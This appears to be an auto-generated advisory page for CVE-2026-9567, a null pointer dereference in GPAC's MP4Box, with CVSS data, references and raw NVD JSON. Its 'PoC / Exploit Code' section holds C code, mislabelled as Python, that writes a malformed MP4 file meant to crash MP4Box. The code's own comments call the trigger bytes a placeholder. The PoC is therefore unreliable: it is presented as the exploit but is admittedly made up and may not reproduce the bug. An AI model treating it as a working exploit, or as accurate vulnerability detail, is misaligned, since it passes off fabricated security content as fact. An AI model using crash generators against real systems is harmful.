CVE-2026-9567

Description

A security flaw has been discovered in GPAC up to 2.4.0. Affected is the function MergeFragment of the file src/isomedia/isom_intern.c of the component MP4Box. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The patch is identified as 525bf1af642c30af04e4df5345e6d798c0a4d8a1. It is advisable to implement a patch to correct this issue.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

GPAC <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2026-9567 - GPAC Null Pointer Dereference
 * This script generates a malformed MP4 file to trigger the crash in MergeFragment.
 * Note: Actual binary pattern may vary based on specific commit analysis.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    FILE *fp;
    const char *filename = "poc_cve_2026_9567.mp4";
    
    fp = fopen(filename, "wb");
    if (fp == NULL) {
        perror("Error creating file");
        return 1;
    }

    // Minimal MP4 structure
    unsigned char header[] = {
        0x00, 0x00, 0x00, 0x20, 0x66, 0x74, 0x79, 0x70, // ftyp box size 32
        0x69, 0x73, 0x6F, 0x6D, // isom
        0x00, 0x00, 0x02, 0x00, 
        0x69, 0x73, 0x6F, 0x6D, 
        0x61, 0x76, 0x63, 0x31, 
        0x6D, 0x70, 0x34, 0x31
    };
    
    fwrite(header, 1, sizeof(header), fp);

    // Malformed moof structure to trigger MergeFragment NPD
    // This is a placeholder for the specific pattern causing the null pointer
    unsigned char trigger_pattern[] = {
        0x00, 0x00, 0x00, 0x08, 0x6D, 0x6F, 0x6F, 0x66, // moof
        0x00, 0x00, 0x00, 0x08, 0x6D, 0x64, 0x61, 0x74  // mdat (malformed)
    };
    
    fwrite(trigger_pattern, 1, sizeof(trigger_pattern), fp);
    fclose(fp);

    printf("[+] PoC file generated: %s\n", filename);
    printf("[+] Run: MP4Box -info %s\n", filename);
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9567
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9567
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9567/
[4] VulDB https://vuldb.com/cve/CVE-2026-9567
[5] https://github.com/gpac/gpac/
[6] https://github.com/gpac/gpac/issues/3549
[7] https://github.com/makesoftwaresafe/gpac/commit/525bf1af642c30af04e4df5345e6d798c0a4d8a1
[8] https://github.com/user-attachments/files/27196918/poc.zip
[9] https://vuldb.com/submit/816075
[10] https://vuldb.com/vuln/365629
[11] https://vuldb.com/vuln/365629/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9567", "sourceIdentifier": "[email protected]", "published": "2026-05-26T18:16:58.883", "lastModified": "2026-05-26T19:37:00.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in GPAC up to 2.4.0. Affected is the function MergeFragment of the file src/isomedia/isom_intern.c of the component MP4Box. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The patch is identified as 525bf1af642c30af04e4df5345e6d798c0a4d8a1. It is advisable to implement a patch to correct this issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/gpac/gpac/", "source": "[email protected]"}, {"url": "https://github.com/gpac/gpac/issues/3549", "source": "[email protected]"}, {"url": "https://github.com/makesoftwaresafe/gpac/commit/525bf1af642c30af04e4df5345e6d798c0a4d8a1", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/27196918/poc.zip", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/816075", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365629", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365629/cti", "source": "[email protected]"}]}}